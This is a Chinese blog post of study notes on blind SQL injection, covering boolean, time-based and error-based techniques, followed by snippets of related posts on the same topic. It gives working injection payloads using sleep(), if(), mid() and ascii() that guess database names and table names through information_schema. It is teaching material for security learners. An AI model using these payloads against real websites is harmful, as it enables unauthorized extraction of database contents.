WEB漏洞-SQL注入之查询方式及报错盲注

已于 2022-01-26 10:41:20 修改
阅读量350 收藏 1
点赞数 1
分类专栏: 渗透笔记2 文章标签: sql 数据库 web安全
于 2022-01-10 12:50:40 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xhscxj/article/details/122363297
版权

SQL注入报错盲注

盲注就是在注入过程中,获取的数据不能回显至前端页面。此时,我们需要利用一些方法进行 判断或者尝试,这个过程称之为盲注。我们可以知道盲注分为以下三类:

基于布尔的SQL盲注-逻辑判断
regexp,like,ascii,left,ord,mid

基于时间的SQL盲注-延时判断
if,sleep

基于报错的SQL盲注-报错会先
floor,updatexml,extractvalue

在burpsuit中GET上参数后面加东西时,空格要用+号代替

参考

like 'ro%' #判断ro或ro…是否成立
regexp '^aaa[a-z]' #匹配aaa及aaa…等
if(条件,5,0) #条件成立 返回5 反之 返回0
sleep(5) #SQL语句延时执行5秒
mid(a,b,c) #从位置b开始,截取a字符串的c长度
substr(a,b,c) #从b位置开始,截取字符串a的c长度
left(database(),1) #left(a,b)从左侧截取a的前b位
length(database())=8 #判断数据库database()名的长度
ord=ascii ascii(x)=97 #判断x的asscii码是否等于97

查询的时候睡眠5秒钟

select * from member where id=1 and sleep(5);

当数据库名为a的时候就显示123,不为a的时候显示456

select if(database()='a',123,456);

两者结合时
查询member表中id等于1的数据,并且当数据库名等于a的时候就睡眠1秒,否则就睡眠0秒

select * from member where id=1 and sleep(if(database()='a',1,0));

当数据库名长度等于8的时候就睡眠5秒,否则就睡眠0秒

select * from member where id=1 and sleep(if(length(database())=8,5,0));

当数据库名第一个字符等于s的时候就睡眠5秒,否则就睡眠0秒

select * from users where id=1 and sleep(if(mid(database(),1,1)='s',5,0));

截取当前数据库中的第一个表的第一个字母,如果这个字母的assic值是101就睡眠3秒,如果不是就睡眠0秒

select * from users where id=1 and sleep(if((ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))=101),3,0))

布尔类型
如果页面没有变化的话就证明版本的左边三个字符是5.5

select * from users where id=1 and left(version(),3)='5.5'
深白色耳机
关注
专栏目录
小迪安全学习笔记--第16天 web漏洞--SQL注入查询方式报错盲注
zr1213159840的博客
12-15 562
当进行SQL注入时,有很多注入会出现无回显的情况,其中不回显的原因可能是SQL语句查询方式的问题导致,这个时候我们需要用到相关的报错盲注进行后续操作,同时作为手工注入时,提前了解或预知其SQL语句大概写法也能更好的选择对应的注入语句。 今天内容涉及两个方面:查询方式和回显以及盲注 select 查询数据 在网站应用中进行数据查询显示操作 select * from news where id = $id insert 插入数据 在网站应用中进行用户注册添加等操作 insert into news(id,
Web系统常见安全漏洞及解决方案-SQL盲注
xiaguag的专栏
03-22 2442
<br />关于web安全测试,目前主要有以下几种攻击方法:<br />1.XSS<br />2.SQL注入<br />3.跨目录访问<br />4.缓冲区溢出<br />5.cookies修改<br />6.Htth方法篡改(包括隐藏字段修改和参数修改)<br />7.CSRF<br />8.CRLF<br />9.命令行注入<br />今天主要讲下SQL盲注。<br />一、SQL 盲注、发现数据库错误模式、跨站点脚本编制<br /><br />严重性: <br />高<br />类型:<br />应用
小迪渗透测试学习笔记(十六)WEB漏洞-SQL注入-查询方式报错盲注
萧丶的博客
01-05 561
当进行SQL注入时,有很多注入会出现无回显的情况,其中不回显的原因可能是SQL语句查询方式的问题导致,这个时候我们需要用到相关的报错盲注进行后续操作,同时作为手工注入时,提前了解或预知其SQL语句大概写法也能更好的选择对应的注入语句。 SQL语句 select 查询数据 在网站应用中进行数据显示查询操作 例:select * from news where id=$id insert 插入数据 在网站应用中进行用户注册添加等操作 例:insert into news(id,url,tex.
WEB漏洞-SQL注入查询方式报错盲注(学习笔记)
qq_19375535的博客
07-01 282
sql学习笔记
使用Burpsuite进行半自动注入 布尔盲注和时间盲注 个人总结
代码审计
03-26 4225
利用前提 , 页面上没有显示位 , 也没有输出 $ QL 语句执行错误信息 。 正确的 SQL 语句和错误的 SQL 语句返回页面都 0 样 , . 但是加入 s 丨 p ( 5 ) 条件之 后 , 页面的返回速度明显慢了 5 秒 。 优点 . 不需要显示位 , 不需要出错信息 。 速度慢 , . 耗费大量时间 。 payload: and if(length(database())=8,sleep(10),1) --+ 判断当前数据库库名的长度 如果数据库库名长度大于等于8,则mysql查询休眠10
WEB 漏洞 - SQL 注入之查询方式报错盲注深度解析
m0_57836225的博客
11-11 318
通过以上对 SQL 注入的查询方式(联合查询、子查询、基于时间的盲注)和报错盲注的详细讲解、防范步骤以及相关代码示例,希望能帮助大家更好地理解和应对这种 WEB 漏洞。在实际的开发和安全防护中,要时刻保持警惕,确保系统的安全性。今天我们重点来探讨 SQL 注入中的查询方式以及报错盲注相关内容,这对于深入理解和应对 SQL 注入攻击有着重要意义。通过这种方式,可以获取额外的信息,比如数据库中的其他数据。函数会因为第二个参数的错误(我们故意构造的)而报错报错信息中会包含我们想要获取的。
第16天:WEB漏洞-SQL注入查询方式报错盲注1
08-03
本话题主要关注的是在没有直接回显的情况下如何进行SQL注入,特别是通过查询方式报错盲注技术。 **查询方式**: 1. **SELECT查询**:通常用于从数据库中检索数据,例如`select * from news where id=$id`。这里的...
墨者学院-SQL注入漏洞测试(报错盲注
weixin_42939822的博客
03-30 5221
墨者学院-SQL注入漏洞测试(报错盲注
小迪安全16 web漏洞SQL注入查询方式报错盲注
qq_46116117的博客
12-25 2516
16 web漏洞SQL注入查询方式报错盲注 ​ 当进行 SQL 注入时,有很多注入会出现无回显的情况,其中不回显 的原因可能是 SQL 语句查询方式的问题导致,这个时候我们需要用到相 关的报错盲注进行后续操作,同时作为手工注入时,提前了解或预知其 SQL 语句大概写法也能更好的选择对应的注入语句 常用sql语句 select 查询数据 在网站应用中进行数据显示查询效果 例: select * from news wher id=$id insert 插入数据 在网站应用中进行用户注册添加等操作 例
墨者学院-SQL注入漏洞测试(报错盲注)
qq_33598708的博客
04-21 2051
启动靶场正常访问: 随便输入账号和密码: 并没有发现什么可用的信息 点击查看公告: 可以看到详细的公告哈!我们看看能不能在公告上做文章。 /new_list.php?id=1 and 1=1 在我以为可以直接注入的时候,我发现1=2的时候也能正常显示哈!!! 然后在找闭合的时候,发现数据库报错的信息会显示出来。所以我们可以利用数据库报错展示出我们想要的数据。 开始注入: updatexml函数错误 updatexml('XML_document',...
CTF系列之Web——联合查询注入
洛柒尘的博客
06-27 3715
前言 在刚学习SQL注入的过程中非常艰难,查资料的时间有一周这么长,点开的网页也不下一千,认真读的也最少有两百,可是能引导入门的真的没几篇,都是复制来复制去的,没意思,感觉就是在浪费时间。有很多知识点都很散,很少能考到一片吧所有知识点总结在一块,最少也要三四个知识点也好呀,可惜太少了,大部分大佬写的都是基于他们现有的技术写的,写的很笼统,不适合新手看。可以发现很多大佬的文章看不懂就是这个原因,没有基础看的很懵的。所以我就想着写两三篇来总结我学习过的SQL注入知识点。 学习web系列推荐先学习MySQL、H
web安全 sql盲注报错注入
m0_68167825的博客
06-13 820
可以基于这个函数,实现盲注。 例: 输入1’ and length(database())>3 – -得到了结果没有报错,所以可以得到数据库名字节数大于3, 输入1’ and length(database())>4 – -得到了结果报错,所以得到数据库名字节数不大于4, 输入1’ and length(database())=4 – -得到结果没报错,所以得到数据库名字节数为4.根据这两个函数得作用,来做盲注猜测。 输入1’ and ascii(substr(database(),1,1))>99 –
Web暴力破解及SQL注入
ClearLove的博客
08-09 9653
Web暴力破解及SQL注入》作业 课程名称:《Web安全(二)》 作业内容: 已知owasp服务器内的网站用户名为:gordonb 密码为6位,前三位为‘abc’后三位为数字,对其进行爆破得到正确的密码并验证。 使用SQLmap对该网站的前3个SQL注入案例进行SQL注入,将用户名和密码展示出一张表,实现拖库操作。 【要求】 ...
如何在Linux中使用Cron定时执行SQL任务
Mr_Wanter
11-08 554
linux crontab 定时执行sql脚本。
Spring Boot集成SQL Server快速入门Demo
最新发布
HBLOG
11-11 584
SQL Server是由Microsoft开发和推广的以客户/服务器(c/s)模式访问、使用Transact-SQL语言的关系数据库管理系统(DBMS),它最初是由Microsoft、Sybase和Ashton-Tate三家公司共同开发的,并于1988年推出了第一个OS/2版本。Microsoft SQL Server近年来不断更新版本,1996年,Microsoft 推出了SQL Server 6.5版本;1998年,SQL Server 7.0版本和用户见面;
sql之count()函数解析
JustinMars的博客
11-07 362
COUNT(*):统计所有行。 COUNT(column_name):统计某列的非 NULL 值。 COUNT(DISTINCT column_name):统计某列中不重复的非 NULL 值。
【PGCCC】Postgresql LWLock 原理
PGCCC的博客
11-07 767
postgresql 的架构是基于多进程的,进程之间往往存在着数据共享,比如缓存读写。这时 postgresql 需要提高一种锁机制来支持并发访问,但是 linux 只实现了线程间的读写锁,所以 postgresql 自己实现进程间的读写锁,它主要利用了信号量和自旋锁来实现。
SQL Server 数据太多如何优化
威哥爱编程,CSDN 博客专家、全栈领域新星创作者、华为 HDE,愿交天下 IT 技术爱好者
11-07 863
并行查询:通过将查询任务拆分为多个子任务,并行地处理,可以显著提高查询性能。并发查询:适用于在多个查询任务之间进行并发执行,无需等待每个查询任务逐个完成,可以加快整体查询速度。通过结合并行查询和并发查询策略,我们可以显著提高电商平台或其他业务系统的查询响应速度,尤其是在高并发的环境中,保证系统的高效性。以上11种优化方案供你参考,优化 SQL Server 数据库性能得从多个方面着手,包括硬件配置、数据库结构、查询优化、索引管理、分区分表、并行处理等。
SQL注入详解:查询方式报错盲注与实战技巧
"本文介绍了WEB漏洞中的SQL注入问题,特别是针对查询方式报错盲注的技巧。内容包括Access偏移注入、SQL语句的基本查询、插入、删除和更新操作,以及不同类型的SQL盲注方法,如布尔盲注、时间盲注报错盲注。" 在...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值